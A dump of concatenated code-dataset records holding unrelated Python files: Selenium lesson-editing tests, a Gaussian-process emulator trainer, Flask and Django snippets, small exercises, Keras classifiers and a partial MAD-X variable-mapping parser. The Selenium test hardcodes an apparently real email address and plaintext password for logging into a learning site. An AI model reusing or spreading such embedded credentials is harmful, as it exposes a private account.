_fake_vifs(cls=osv_vif.VIFOpenVSwitch, prefix='eth'):\n return {'eth0': _fake_vif(cls), prefix+'1': _fake_vif(cls)}\n\n\ndef _fake_vifs_dict(obj=None):\n if obj:\n return {\n ifname: vif.obj_to_primitive() for\n ifname, vif in obj.items()\n }\n else:\n return {\n ifname: vif.obj_to_primitive() for\n ifname, vif in _fake_vifs().items()\n }\n\n\ndef _fake_vifs_string(dictionary=None):\n if dictionary:\n return jsonutils.dumps(dictionary)\n else:\n return jsonutils.dumps(_fake_vifs_dict())\n","sub_path":"kuryr_kubernetes/tests/fake.py","file_name":"fake.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"96120601","text":"import time\nimport unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\n\n\nurl = \"https://stepic.org/lesson/%D0%9A%D0%B0%D0%BA-%D0%B8%D0%B3%D1%80%D0%B0%D1%82%D1%8C-%D0%B8%D0%BD%D1%82%D1%80%D0%BE-%D0%B8%D0%B7-Stairway-to-Heaven-%D0%BD%D0%B0-%D1%83%D0%BA%D1%83%D0%BB%D0%B5%D0%BB%D0%B5-31049/step/3\"\nusername = \"liakhulia@gmail.com\"\npassword = \"512345\"\npath_to_chromedriver = \"C://chromedriver\"\ntest_text = \"Answer below\"\n\nclass LessonEdit(unittest.TestCase):\n\n def setUp(self):\n self.driver = webdriver.Chrome(path_to_chromedriver)\n #self.driver = webdriver.Firefox()\n def open_lesson_to_edit(self):\n driver = self.driver\n driver.get(url)\n driver.implicitly_wait(10)\n\n elem = driver.find_element_by_xpath('//*[@class = \"introjs-button introjs-skipbutton\"]')\n elem.click()\n\n alert = driver.switch_to.alert\n alert.accept()\n print(\"alert accepted\")\n\n time.sleep(2)\n login = driver.find_element_by_xpath('//*[@class = \"navbar\"]/div[2]/a[1]')\n login.click()\n\n login_field = driver.find_element_by_id('id_login')\n login_field.send_keys(username)\n password_field = driver.find_element_by_id('id_password')\n password_field.send_keys(password)\n password_field.send_keys(Keys.RETURN)\n\n\n edit = driver.find_element_by_xpath('//*[@class = \"lesson-header__buttons\"]/a[1]')\n edit.click()\n\n def restore_correst_option(self):\n driver = self.driver\n\n driver.execute_script(\"window.scrollTo(0, 0)\") # hardcoded\n edit = driver.find_element_by_xpath('//*[@class = \"lesson-header__buttons\"]/a[1]')\n edit.click()\n\n\n checkbox1 = driver.find_element_by_xpath('(//*[@class = \"s-checkbox__border\"])[5]')\n checkbox2 = driver.find_element_by_xpath('(//*[@class = \"s-checkbox__border\"])[3]')\n\n save = driver.find_element_by_xpath('//*[@class=\"lesson-editor__complete-actions\"]/button[1]')\n\n driver.execute_script(\"window.scrollTo(0, 810)\") #hardcoded\n\n checkbox1.click()\n checkbox2.click()\n save.click()\n\n def restore_textfield(self):\n driver = self.driver\n driver.execute_script(\"window.scrollTo(0, 0)\") # hardcoded\n edit = driver.find_element_by_xpath('//*[@class = \"lesson-header__buttons\"]/a[1]')\n edit.click()\n\n textfield = driver.find_element_by_xpath('//*[@class=\"wysihtml5-textarea step-text-wrapper wysi-textarea__body theory\"]')\n for i in range (len(test_text)):\n textfield.send_keys(Keys.BACK_SPACE)\n\n\n def test_correct_answer(self):\n self.open_lesson_to_edit()\n print (\"Testing correct option\")\n driver = self.driver\n\n checkbox1 = driver.find_element_by_xpath('(//*[@class = \"s-checkbox__border\"])[5]')\n checkbox2 = driver.find_element_by_xpath('(//*[@class = \"s-checkbox__border\"])[3]')\n\n save = driver.find_element_by_xpath('//*[@class=\"lesson-editor__complete-actions\"]/button[1]')\n\n driver.execute_script(\"window.scrollTo(0, 810)\") #hardcoded\n\n checkbox1.click()\n checkbox2.click()\n save.click()\n\n start = driver.find_element_by_xpath('(//*[@class = \"attempt__actions\"])/button[1]')\n\n start.click()\n time.sleep(1)\n driver.execute_script(\"window.scrollTo(0, 315)\") # hardcoded\n\n option = driver.find_element_by_xpath('(//*[@class = \"s-radio__border\"])[1]')\n\n option.click()\n submit = driver.find_element_by_xpath('//*[@class = \"submit-submission\"]')\n\n submit.click()\n try:\n correct = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH, '//*[@class = \"attempt-wrapper__result-icon ember-view svg-icon correct_icon\"]'))\n )\n except:\n self.fail(\"Incorrect answer\")\n\n self.restore_correst_option()\n\n def test_edit_text(self):\n self.open_lesson_to_edit()\n print(\"Testing text editing\")\n\n driver = self.driver\n\n textfield = driver.find_element_by_xpath('//*[@class=\"wysihtml5-textarea step-text-wrapper wysi-textarea__body theory\"]')\n\n textfield.send_keys(\"Answer below\")\n\n assert \"below\" in textfield.text\n\n elem = driver.find_element_by_xpath('//*[@class=\"lesson-editor__complete-actions\"]/button[1]')\n elem.click()\n\n textfield = driver.find_element_by_xpath('//*[@class=\"ember-view step-text-wrapper\"]')\n assert \"below\" in textfield.text\n\n self.restore_textfield()\n\n def test_too_many_options(self):\n self.open_lesson_to_edit()\n print (\"Testing quiz options. Too many options warning.\")\n driver = self.driver\n checkbox = driver.find_element_by_xpath('(//*[@class = \"s-checkbox__border\"])[3]')\n\n driver.execute_script(\"window.scrollTo(0, 810)\") #hardcoded\n\n\n checkbox.click()\n\n\n save = driver.find_element_by_xpath('//*[@class=\"lesson-editor__complete-actions\"]/button[1]')\n save.click()\n\n try:\n warning = driver.find_element_by_xpath('//*[@class = \"s-hint s-hint_warning\"]')\n\n except:\n self.fail (\"Warning is not displayed\")\n\n\n try:\n error = driver.find_element_by_xpath('//*[@class = \"error\"]')\n except:\n self.fail(\"Error is not displayed\")\n\n\n def test_no_options(self):\n self.open_lesson_to_edit()\n print(\"Testing quiz options. No options selected.\")\n\n driver = self.driver\n checkbox = driver.find_element_by_xpath('(//*[@class = \"s-checkbox__border\"])[5]')\n\n driver.execute_script(\"window.scrollTo(0, 810)\") #hardcoded\n checkbox.click()\n\n save = driver.find_element_by_xpath('//*[@class=\"lesson-editor__complete-actions\"]/button[1]')\n save.click()\n\n try:\n warning = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.XPATH, '//*[@class = \"s-hint s-hint_warning\"]'))\n )\n\n except:\n self.fail (\"Warning is not displayed\")\n\n\n try:\n error = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.XPATH, '//*[@class = \"error\"]'))\n )\n\n except:\n self.fail(\"Error is not displayed\")\n\n\n try:\n WebDriverWait(driver, 10).until(\n EC.alert_is_present()\n )\n alert = driver.switch_to.alert\n alert.accept()\n except:\n print(\"No alert is present\")\n\n\n\n def tearDown(self):\n self.driver.close()\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"326037798","text":"import os\nimport sys\nif sys.version_info > (3, 0):\n import pickle\nelse:\n import cPickle as pickle\nimport autograd.numpy as np\nimport pandas as pd\nimport argparse\n\nfrom Emulator.Emulator import EmulatorMaster, RBF\nfrom Preprocessor.PipeLine import PipeLine, Normalize, PCA\nfrom DataReader.DataLoader import DataLoader\n\ndef Training(args):\n data = DataLoader(args['Prior'], args['ModelData'], args['ExpData'])\n \n \"\"\"\n we need to normalized the observed points for better emulation\n We need to normalize both the output and input space\n for output space, PCA is also performed for dimension reduction\n \"\"\"\n output_pipe = PipeLine([('Normalize', Normalize()), ('PCA', PCA(args['principalcomp'], args['fraction'])), ('Normalized', Normalize())])\n input_pipe = Normalize()\n\n emulator = EmulatorMaster(data.sim_para, data.sim_data, input_pipe, output_pipe)\n \n if len(args['initialscale']) == 1:\n initial_scale = np.full(len(data.par_name), args['initialscale'][0])\n elif len(args['initialscale']) != len(data.par_name):\n print('Initial scale must have the same dimension as number of parameters. Abort!')\n sys.exit()\n else:\n initial_scale = np.array(args['initialscale'])\n \n if args['covariancefunc'] == 'RBF':\n emulator.SetCovariance(RBF)\n initial_scale = args['initialscale']\n\n scales, nuggets = emulator.Train(initial_scale, \n args['initialnugget'], \n max_step=args['maxsteps'], \n scales_rate=args['scalerate'], \n nuggets_rate=args['nuggetrate'])\n \n \"\"\"\n Write all the training result, together with training points and pipe used to a file\n \"\"\"\n output_name = os.path.join('training', '%s.pkl' % args['Training_name'])\n if args['abs']:\n output_name = args['Training_name']\n with open(output_name, 'wb') as buff:\n pickle.dump({'emulator': emulator, 'data': data,\n 'scales': scales, 'nuggets': nuggets}, buff)\n\n\nif __name__=='__main__':\n\n parser = argparse.ArgumentParser(description='This script will choose an optimal set of hyperparameters by minizing loss function')\n parser.add_argument('Prior', help='Locatioin of parameter priors')\n parser.add_argument('ModelData', help='Location of the model simulation files')\n parser.add_argument('ExpData', help='Location of the experimental result')\n parser.add_argument('Training_name', help='Output filename of the optimized emulator. It will be stored under folder \"training/\"')\n parser.add_argument('-cf', '--covariancefunc', default='ARD', help='Your choice of different covariance function (Default: ARD)')\n parser.add_argument('-pc', '--principalcomp', default=3, type=int, help='Number of principal components used (Default: 3)')\n parser.add_argument('-is', '--initialscale', default=[0.5], type=float, nargs='+', help='Initial Scale. If array is needed, please enter more than 1 number in this argument')\n parser.add_argument('-in', '--initialnugget', default=1, type=float, help='Initial Scale. Input must be an array of the same size as number of parameters.')\n parser.add_argument('-sr', '--scalerate', default=0.003, type=float, help='Rate at which scale will advance in 1 step (Default: 0.003)')\n parser.add_argument('-nr', '--nuggetrate', default=0.003, type=float, help='Rate at which nugget will advance in 1 step (Default: 0.003)')\n parser.add_argument('-ms', '--maxsteps', default=1000, type=int, help='Maximum training steps allowed (Default: 1000)')\n parser.add_argument('-fr', '--fraction', default=None, type=float, help='Fraction of PCA variance used. Once set it will override pc (Default: None)')\n parser.add_argument('-a', '--abs', action='store_true', help='If selected, the output training name will be in absolute path')\n args = vars(parser.parse_args())\n \n Training(args)\n \n","sub_path":"Training.py","file_name":"Training.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"496002924","text":"from django.conf.urls.defaults import *\nfrom django.contrib import admin\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\nadmin.autodiscover()\n\nhandler500 = 'djangotoolbox.errorviews.server_error'\n\nurlpatterns = patterns('',\n ('^_ah/warmup$', 'djangoappengine.views.warmup'),\n (r'^admin/', include(admin.site.urls)),\n ('', include('cms.urls')),\n)\n\nurlpatterns += staticfiles_urlpatterns()\n","sub_path":"writesite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"371280536","text":"# name : slip \n# date : 2019/7/7 11:09 \n# e-mail : slip1233@126.com\n\n# 进程\nimport multiprocessing\ndata_list = []\ndef task(arg):\n data_list.append(arg)\n print(data_list)\n\ndef run():\n for i in range(10):\n m = multiprocessing.Process(target=task, args=(i,))\n m.start()\n\nif __name__ == '__main__':\n run()\n print(data_list) # []","sub_path":"进程线程/day34/1.进程的使用.py","file_name":"1.进程的使用.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"584163266","text":"#!/usr/bin/python3\nfrom models import storage\nfrom flask import Flask, render_template\n\n\napp = Flask(__name__)\napp.url_map.strict_slashes = False\n\n\n@app.route('/states')\n@app.route('/states_list')\ndef states_list():\n lis = storage.all(\"State\").values()\n return render_template('7-states_list.html', lis=lis)\n\n\n@app.route('/cities_by_states')\ndef cities_states():\n st = storage.all('State').values()\n return render_template('8-cities_by_states.html', st=st)\n\n\n@app.route('/states/')\ndef cit_b_st(id):\n lis = storage.all('State')\n if \"State.\" + id in lis:\n state = lis[\"State.\" + id]\n else:\n state = None\n return render_template('9-states.html', state=state)\n\n\n@app.teardown_appcontext\ndef shutdown_(self):\n storage.close()\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port='5000')\n","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"201290064","text":"\"\"\"\n第一题language比较复杂,但读懂了的话就是基本的simulation.\n给一个String, 找整个string的maxima frequency\nmaxima frequency是在目前index上的substring(0, i)给目前最大freq occurrence的字母加一分,结果要整个string最大的maxima frequency.\n例子详解:\n比如说 abbcca\nidx = 0,\nfreqency最大的是a, maxima freq of a = 1,\nidx = 1\n最大的freqency是a和b, maxima freq of a = 2, b = 1\nidx = 2\n最大的frequency是b, maxima freq of b = 2\nidx = 3\n最大的frequency是b, maxima freq of b = 3\nidx = 4\n最大的frequency是b和c, maxima freq of b = 4, maxima freq of c = 1\nidx = 5\n最大的frequency是a,b和c, maxima freq of a = 3, maxima freq of b = 5, maxima freq of c = 2\n最后的map是 {a: 3, b: 5, c: 3}\n所以最后是return 5\n\n\"\"\"\nfrom collections import defaultdict, deque\n\n\ndef maxFrequency(nums):\n maxNum = []\n res = {}\n count = defaultdict(int)\n for item in nums:\n count[item] += 1\n while maxNum and maxNum[-1][0] < count[item]:\n maxNum.pop()\n if not maxNum or maxNum[-1][0] == count[item]:\n maxNum.append((count[item], item))\n for n, c in maxNum:\n if c not in res:\n res[c] = 1\n else:\n res[c] += 1\n return res\n\n\nnums = \"abbcca\"\nprint(maxFrequency(nums))\n# {a: 3, b: 5, c: 2}\n","sub_path":"Amazon/maxFrequency.py","file_name":"maxFrequency.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"329428656","text":"import time\nfrom binary_search_tree import BinarySearchTree\n\n\nf = open('names_1.txt', 'r')\nnames_1 = f.read().split(\"\\n\") # List containing 10000 names\nf.close()\n\nf = open('names_2.txt', 'r')\nnames_2 = f.read().split(\"\\n\") # List containing 10000 names\nf.close()\n\nstart_time = time.time()\nduplicates = []\n\n# Time Compelexity for this is O(n*m).\n\n# for name_1 in names_1:\n# for name_2 in names_2:\n# if name_1 == name_2:\n# duplicates.append(name_1)\n\n# ATTEMPT 1\n# Let's use a binary search tree\n# This will have Time Complexity of O(log(n)) for insertion and O(log(n)) for look up\n# So in total this is O(log(n) + log(n)) => O(log(n))\nbst = BinarySearchTree(names_1[0])\n\n# Slice the first element off since it's already included in the BinarySearchTree\nfor name_1 in names_1[1:]:\n bst.insert(name_1)\n\nfor name_2 in names_2:\n if bst.contains(name_2):\n duplicates.append(name_2)\n\n\n\nend_time = time.time()\nprint (f\"{len(duplicates)} duplicates:\\n\\n{', '.join(duplicates)}\\n\\n\")\nprint (f\"runtime: {end_time - start_time} seconds\")\n\n# ---------- Stretch Goal -----------\n# Python has built-in tools that allow for a very efficient approach to this problem\n# What's the best time you can accomplish with no restrictions on techniques or data\n# structures?\n\nstart_time = time.time()\n\nduplicates_stretch = []\n\n# STRETCH ATTEMPT 1\n\n# Runtime for this is 0.0076 at max\n# Time Complexity is O(max(n, m))\n\nnames_dict_stretch = {}\nfor x in range(0, len(names_1)):\n names_dict_stretch[names_1[x]] = x\n\nfor name_2 in names_2:\n if name_2 in names_dict_stretch:\n duplicates_stretch.append(name_2)\n\n\nend_time = time.time()\nprint (f\"{len(duplicates_stretch)} duplicates:\\n\\n{', '.join(duplicates_stretch)}\\n\\n\")\nprint (f\"runtime: {end_time - start_time} seconds\")\n\n\n# ------- STRETCH ATTEMPT 2 ---------\n\n\nstart_time = time.time()\n\n# STRETCH ATTEMPT 2\nduplicates_stretch_2 = list(set(names_1) & set(names_2))\n\n\nend_time = time.time()\nprint (f\"{len(duplicates_stretch_2)} duplicates:\\n\\n{', '.join(duplicates_stretch_2)}\\n\\n\")\nprint (f\"runtime: {end_time - start_time} seconds\")","sub_path":"names/names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"4188067","text":"import pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom sklearn.metrics import confusion_matrix, roc_auc_score\nimport matplotlib.pyplot as plt\nimport ast\n\n## Both of these random seeds are set to improve the reproducibility of results\nfrom numpy.random import seed\nseed(1)\n\nfrom tensorflow import set_random_seed\nset_random_seed(2)\n\noutcomes_train_df = pd.read_csv('../preprocessing/outcomes_data_train.csv')\noutcomes_test_df = pd.read_csv('../preprocessing/outcomes_data_test.csv')\n\n# Different attributes could be selected for training to determine which features provided the best classification results\nX_train = outcomes_train_df[['DGN', 'PRE6', 'PRE14', 'PRE7', 'PRE8', 'PRE9', 'PRE10', 'PRE11', 'PRE17', 'PRE19',\n 'PRE25', 'PRE30', 'PRE32', 'PRE4']].values\ny_train = outcomes_train_df[['Risk1Yr']].values\n\nX_test = outcomes_test_df[['DGN', 'PRE6', 'PRE14', 'PRE7', 'PRE8', 'PRE9', 'PRE10', 'PRE11', 'PRE17', 'PRE19',\n 'PRE25', 'PRE30', 'PRE32', 'PRE4']].values\ny_test = outcomes_test_df[['Risk1Yr']].values\n\n# This function converted the data from the CSV to a numpy array which is used for training the neural network model\ndef convert_to_numpy(dataframe):\n new_dataframe = []\n for row in dataframe.tolist():\n for value in range(len(row)):\n print(isinstance(row[value], str))\n if isinstance(row[value], str):\n row[value] = ast.literal_eval(row[value])\n new_row = []\n for element in row:\n if isinstance(element,list):\n for value in element:\n new_row.append(value)\n continue\n new_row.append(element)\n new_dataframe.append(new_row)\n return np.asarray(new_dataframe)\n\nX_train = convert_to_numpy(X_train)\nX_test = convert_to_numpy(X_test)\n\n# This is our first model which was a deep neural network that used rectified linear activation units\n# Dropout was used as regularization of our network and each layer had 64 nodes\nmodel = Sequential()\nmodel.add(Dense(64, input_dim=25, activation='relu'))\nmodel.add(Dropout(0.1))\nmodel.add(Dense(64, activation='relu'))\nmodel.add(Dropout(0.1))\nmodel.add(Dense(64, activation='relu'))\nmodel.add(Dropout(0.1))\nmodel.add(Dense(1, activation='relu'))\n\n# This functions compiles the above model with its associated loss function and optimizer\n# We used mean squared error as the loss function with the Adam optimizer\nmodel.compile(loss='mean_squared_error',\n optimizer='adam',\n metrics=['accuracy'])\n\n# This trains the model using 500 epochs and a batch size of 50\nmodel.fit(X_train, y_train,\n epochs=500,\n batch_size=50, verbose=1)\n\n# This was used to return the model's predictions (probabilities) on the test set\n# As well as convert the probabilities to the class labels\ny_pred_1 = model.predict(X_test)\ny_pred_bool = (y_pred_1 >= 0.5)\n\n# This evaluates the trained model on the test set\nscore, acc = model.evaluate(X_test, y_test, batch_size=100)\nprint('Test accuracy: ', acc)\n\ncm = confusion_matrix(y_test, y_pred_bool)\nprint(cm)\nprint(roc_auc_score(y_test, y_pred_1))\n\n# This is our second model which was a shallow neural network that used hyperbolic tangent activation functions\n# Dropout was used as regularization of our network and each layer had 64 nodes\nmodel = Sequential()\nmodel.add(Dense(64, input_dim=25, activation='tanh'))\nmodel.add(Dropout(0.1))\nmodel.add(Dense(64, activation='tanh'))\nmodel.add(Dropout(0.1))\nmodel.add(Dense(1, activation='tanh'))\n\n# This functions compiles the above model with its associated loss function and optimizer\n# We used mean squared error as the loss function with the stochastic gradient descent optimizer\nmodel.compile(loss='mean_squared_error',\n optimizer='sgd',\n metrics=['accuracy'])\n\n# This trains the model using 500 epochs and a batch size of 50\nmodel.fit(X_train, y_train,\n epochs=500,\n batch_size=50, verbose=1)\n\n# This was used to return the model's predictions (probabilities) on the test set\n# As well as convert the probabilities to the class labels\ny_pred_2 = model.predict(X_test)\ny_pred_bool = (y_pred_2 >= 0.5)\n\n# This evaluates the trained model on the test sets\nscore, acc = model.evaluate(X_test, y_test, batch_size=100)\nprint('Test accuracy: ', acc)\n\ncm = confusion_matrix(y_test, y_pred_bool)\nprint(cm)\nprint(roc_auc_score(y_test, y_pred_2))\n\n# This is our third model which was a shallow neural network that used sigmoid activation functions\n# Dropout was used as regularization of our network and each layer had 64 nodes\nmodel = Sequential()\nmodel.add(Dense(64, input_dim=25, activation='hard_sigmoid'))\nmodel.add(Dropout(0.1))\nmodel.add(Dense(64, activation='hard_sigmoid'))\nmodel.add(Dropout(0.1))\nmodel.add(Dense(1, activation='hard_sigmoid'))\n \n#This functions compiles the above model with its associated loss function and optimizer\n# We used binary cross entropy error as the loss function with the stochastic gradient descent optimizer\nmodel.compile(loss='binary_crossentropy',\n optimizer='sgd',\n metrics=['accuracy'])\n\n# This trains the model using 500 epochs and a batch size of 50\nmodel.fit(X_train, y_train,\n epochs=500,\n batch_size=50, verbose=1)\n\n# This was used to return the model's predictions (probabilities) on the test set\n# As well as convert the probabilities to the class labels\ny_pred_3 = model.predict(X_test)\ny_pred_bool = (y_pred_3 >= 0.5)\n\n# This evaluates the trained model on the test sets\nscore, acc = model.evaluate(X_test, y_test, batch_size=100)\nprint('Test accuracy: ', acc)\ncm = confusion_matrix(y_test, y_pred_bool)\nprint(cm)\nprint(roc_auc_score(y_test, y_pred_3))\n\n# This section of code determines the false positive rates and true positive rates\n# for each model in addition to the AUC so that the ROC Curves can be plotted\nfrom sklearn.metrics import roc_curve\nfpr_keras_1, tpr_keras_1, thresholds_keras_1 = roc_curve(y_test, y_pred_1.ravel())\nfrom sklearn.metrics import auc\nauc_keras_1 = auc(fpr_keras_1, tpr_keras_1)\n\nfpr_keras_2, tpr_keras_2, thresholds_keras_2 = roc_curve(y_test, y_pred_2.ravel())\nauc_keras_2 = auc(fpr_keras_2, tpr_keras_2)\n\n\nfpr_keras_3, tpr_keras_3, thresholds_keras_3 = roc_curve(y_test, y_pred_3.ravel())\nauc_keras_3 = auc(fpr_keras_3, tpr_keras_3)\n\n# This code plots all of the ROC curves onto one plot so that they can be compared effectively\nplt.figure(1)\nplt.plot([0, 1], [0, 1], 'k--')\nplt.plot(fpr_keras_1, tpr_keras_1, label='Model 1 (area = {:.3f})'.format(auc_keras_1))\nplt.plot(fpr_keras_2, tpr_keras_2, label='Model 2 (area = {:.3f})'.format(auc_keras_2))\nplt.plot(fpr_keras_3, tpr_keras_3, label='Model 3 (area = {:.3f})'.format(auc_keras_3))\nplt.xlabel('False positive rate')\nplt.ylabel('True positive rate')\nplt.title('ROC curve')\nplt.legend(loc='best')\nplt.show()\n","sub_path":"train/neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":6955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"99818133","text":"\"\"\"Maze game\nPython3\nUTF-8\"\"\"\n\nimport random\nimport pygame\n\nfrom constants import WINDOW, YOUWIN, YOULOST\nfrom maze import Maze\nfrom characters import Characters, MacGyver\nfrom items import Items\n\nif __name__ == '__main__':\n pygame.init()\n\n MAZE = Maze('structure.txt')\n MAZE.read()\n\n ITEM1_POS = Items.random_position()\n ITEM2_POS = Items.random_position()\n ITEM3_POS = Items.random_position()\n\n MacGyver.act_pos = (MacGyver.find_macgyver())\n GUARD_POS = (Characters.find_guardian())\n\n \"\"\"Principal loop\"\"\"\n GAME = 1\n while GAME:\n MAZE.display()\n pygame.display.flip()\n\n Items.check_items(ITEM1_POS, ITEM2_POS, ITEM3_POS, MacGyver.act_pos)\n\n MacGyver.movements_and_quit((MacGyver.act_pos))\n MacGyver.print_mg((MacGyver.pix_position))\n\n if MacGyver.asleep_guardian(GUARD_POS, MacGyver.act_pos) != 0:\n if MacGyver.asleep_guardian(GUARD_POS, MacGyver.act_pos) == 1:\n print(\"You win\")\n WINDOW.blit(YOUWIN, (0, 0))\n pygame.display.flip()\n pygame.time.wait(5000)\n GAME = 0\n\n if MacGyver.asleep_guardian(GUARD_POS, MacGyver.act_pos) == 2:\n print(\"You lost\")\n WINDOW.blit(YOULOST, (0, 0))\n pygame.display.flip()\n pygame.time.wait(5000)\n GAME = 0\n\n pygame.display.quit()\n pygame.quit()\n exit()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"514875421","text":"\"\"\"\nReverse a String - Enter a string and the program will reverse it and print it out.\n\nPig Latin - Pig Latin is a game of alterations played on the English language game.\nTo create the Pig Latin form of an English word the initial consonant sound is transposed\nto the end of the word and an ay is affixed.\n\nCount Vowels - Enter a string and the program counts the number of vowels in the text.\nFor added complexity have it report a sum of each vowel found.\n\nCheck if Palindrome - Checks if the string entered by the user is a palindrome.\nThat is that it reads the same forwards as backwards.\n\nCount Words in a String - Counts the number of individual words in a string.\nFor added complexity read these strings in from a text file and generate a summary.\n\"\"\"\n\n\nclass MyString:\n \"\"\"\n Class that store strings\n \"\"\"\n @staticmethod\n def reverse(some_seq):\n \"\"\"\n :param some_seq: Sequence\n :return: Sequence: reversed version\n \"\"\"\n return some_seq[::-1]\n\n @staticmethod\n def count_vowels(vowel_str):\n \"\"\"\n :param vowel_str: String\n :return: Integer: No. of vowels or 0\n \"\"\"\n vowels = \"aeiou\"\n count = {char: 0 for char in vowels}\n for char in vowel_str:\n if char in vowels:\n count[char] += 1\n return count\n\n def is_palindrome(self, some_seq):\n \"\"\"\n :param some_seq: sequence of anything\n :return: Boolean: palindrome check of sequence passed\n \"\"\"\n return some_seq == self.reverse(some_seq)\n\n @staticmethod\n def count_words(word_str=None, file=None):\n \"\"\"\n :param word_str: A string\n :param file: A file to be read\n \"\"\"\n word_count = 0\n if word_str:\n word_count = len(word_str.split())\n if file:\n with open(file) as f_str:\n word_count = len(f_str.read().split())\n return word_count\n\n def find_in_iter(self, some_iter):\n \"\"\"just an example for someone.\"\"\"\n return self.str_iter(some_iter) if isinstance(some_iter, str) \\\n else self.int_iter(some_iter) if isinstance(some_iter[0], int) else None\n\n @staticmethod\n def str_iter(iteration):\n \"\"\"str\"\"\"\n\n def cond(sequence, con_str):\n \"\"\"cond\"\"\"\n return [char for char in con_str if char in sequence]\n\n vowels = \"a,e,i,o,u\"\n return [word for word in iteration.lower().split(\" \") if len(cond(vowels, word)) > 1]\n\n @staticmethod\n def int_iter(iteration):\n \"\"\"int\"\"\"\n return [num for num in iteration if num > 5]\n\n @staticmethod\n def pig_latin(pig_str):\n \"\"\"\n Pig Latin – Pig Latin is a game of alterations played on the English language game.\n To create the Pig Latin form of an English word the initial consonant sound is transposed\n to the end of the word and an ay is affixed\n \"\"\"\n words = []\n vowels = 'aeiou'\n for word in pig_str.split():\n if len(word) > 2 and word[0] not in vowels:\n words.append(word[1:] + '-' + word[0] + 'ay')\n else:\n words.append(word + '-ay')\n return ' '.join(words)\n\n\nif __name__ == '__main__':\n X = input(\"Type Something: \")\n STR = MyString()\n print(\"Reversed sequence is: \", STR.reverse(X))\n print(\"Amount of vowels are: \", STR.count_vowels(X))\n print(\"Is the word palindrome: \", STR.is_palindrome(X))\n print(\"Amount of words are: \", STR.count_words(X))\n print(\"The iterations are: \", STR.find_in_iter(X))\n print(\"The pig latins are: \", STR.pig_latin(X))\n","sub_path":"projects/text_list.py","file_name":"text_list.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"22727950","text":"\"\"\"\n Functions to create mapping from variables to magnets based on sequence_file.\n Assumptions:\n\n - magnets named \"mb.***\" are defined by their bending radius and are hence immutable!\n - Sequence is saved in a way, that magnets definitions contain 'knl:={}', 'ksl:={}' or 'K#:='\n - There is only one value in each knl/ksl array.\n - zero-offset, i.e. no fixed number summation (see hint below)\n - linearity, i.e. variables do not multiply with each other (will result in zeros)\n - the variable-name is final (i.e. it is not reassigned by ':=' somewhere else)\n - the variable-name does not start with \"l.\" (reserved for length multiplier)\n - the length multiplier is given by l.\n - apart from the length, there are no other named multipliers (numbers are fine)\n\n If a magnet is redefined, the last definition is used. (not really an assumption)\n\n HINT: 'magnet := #.### + var' WILL NOT RESULT IN A VALID MAPPING !!!\n (e.g. '1 + var' is indistinguishable from '2 * var', which is not what you want!)\n\"\"\"\n\nimport cPickle as pickle\nimport os\nimport re\nfrom collections import OrderedDict\n\nimport pandas as pd\n\nfrom Utilities import logging_tools as logtool\nfrom Utilities import tfs_pandas as tfs\nfrom Utilities.contexts import timeit\nfrom Utilities.iotools import json_dumps_readable\n\nLOG = logtool.get_logger(__name__)\n\nEXT = \"varmap\" # Extension Standard\n\n\"\"\"\n============================= Main =============================\n\"\"\"\nDEFAULT = {\n 'return': \"dictionary\",\n 'ret_choices': [\"dataframe\", \"dictionary\"],\n}\n\n\ndef parse_variable_mapping(seqfile_path, ret=DEFAULT['return']):\n \"\"\" Main Function for creating the variable mapping\n\n Args:\n seqfile_path: Saved Sequence file\n ret: return format, either \"tfs\" or \"dictionary\"\n\n Returns:\n Dictionary of orders containing either a\n DataFrame of magnets(index) vs. variables(columns)\n containing the variable-coefficients\n or a\n Dictionary of all variables containing magnet-coefficient Series\n \"\"\"\n LOG.info(\"Parsing file '{:s}'\".format(seqfile_path))\n\n _check_ret(ret)\n\n with timeit(lambda t:\n LOG.debug(\" File parsed in {:f}s\".format(t))):\n magnet_strings, length_constants = _read_file_for_magnets(seqfile_path)\n if ret.lower() == \"dataframe\":\n return _build_variable_mapping_df(magnet_strings, length_constants)\n\n elif ret.lower() == \"dictionary\":\n return _build_variable_mapping_dict(magnet_strings, length_constants)\n\n\ndef load_variable_mapping(seqfile_path, ret=DEFAULT['return']):\n \"\"\" 